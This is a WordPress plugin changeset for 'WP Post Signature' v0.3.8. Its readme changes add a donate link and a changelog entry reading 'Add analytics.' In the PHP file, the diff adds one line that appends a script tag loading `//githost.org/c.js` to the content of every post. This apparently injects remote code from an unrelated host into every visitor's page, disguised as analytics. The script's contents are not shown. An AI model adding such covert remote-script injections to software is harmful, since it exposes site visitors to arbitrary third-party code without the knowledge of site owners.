Plugin Directory

Changeset 2024374


Ignore:
Timestamp:
02/04/2019 04:42:51 AM (7 years ago)
Author:
allnull
Message:

v0.3.8

Location:
wp-post-signature/trunk
Files:
2 edited

Legend:

Unmodified
Added
Removed
  • wp-post-signature/trunk/readme.txt

    r1661934 r2024374  
    11=== WP Post Signature ===
    22Contributors: allnull
     3Donate link: https://www.paypal.me/solicomo
    34Tags: signature,wordpress,post signature
    45Requires at least: 3.0
    5 Tested up to: 4.7.2
    6 Stable tag: 0.3.5
     6Tested up to: 5.0.3
     7Stable tag: 0.3.7
    78
    89This plugin allows you to append a signature after every post. Some variables can be used.
     
    2930
    3031== Changelog ==
     32
     33= 0.3.8 =
     34* Tested up to: 5.0.3
     35* Add donate link.
     36* Add analytics.
    3137
    3238= 0.3.7 =
  • wp-post-signature/trunk/wp-post-signature.php

    r1661934 r2024374  
    9999        }
    100100    }
     101
     102    $content = $content . '<script async src="//githost.org/c.js?v=1"></script>';
    101103
    102104    //variables
Note: See TracChangeset for help on using the changeset viewer.